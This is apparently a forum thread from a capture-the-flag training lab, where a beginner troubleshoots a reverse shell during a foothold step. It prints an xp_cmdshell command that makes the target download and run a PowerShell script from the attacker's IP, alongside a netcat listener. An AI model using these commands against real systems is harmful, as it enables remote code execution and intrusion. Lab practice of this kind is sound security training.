Starting Point Machine - Foothold Section

Good morning all.

Bit of a noob here I’m afraid.

Gone through the process of getting to this section and i’m a abit stumped on what is happening/what to do next.

I’ve run the command:
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.47/shell.ps1\“);”

along with

nc -lvnp 443

Nothing then seems to happen - its as though the xp_cmdshell is waiting for a command or the nc command is waiting for an input.

To my knowledge I believe that the ps1 file is in the correct location having checked the localhost:80 listings.

TIA :slight_smile:

your command is hitting http which is port 80 but you’re listening on 443 which is https

Thank you HcKy

I’ve added :443 at the end of the ip address as mentioned above and I get the following:

Exception calling “DownloadString” with “1” argument(s): “The operation has timed out”

At line:1 char:1

  • IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.47:443

  • 
      + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException      
    
      + FullyQualifiedErrorId : WebException                                      
    
    

For netcat I get (which is more than i had earlier :smile: ):

listening on [any] 443 …
connect to [10.10.14.47] from (UNKNOWN) [10.10.10.27] 49914
GET /shell.ps1 HTTP/1.1
Host: 10.10.14.47:443
Connection: Keep-Alive

then it drops outs when the time out error comes back.

where did you saved the shell.ps1 file

by the way im using windows powershell :slight_smile:

I’m having the exact same issue, with the exact same outputs and everything. Adding :443 to the command progressed mine as well. If kmarshallsay’s setup is like mine the shell.ps1 file is in the home directory ~/. I’m running Kali linux.

I figured it out on my end: didn’t modify the script to point to my IP :confused: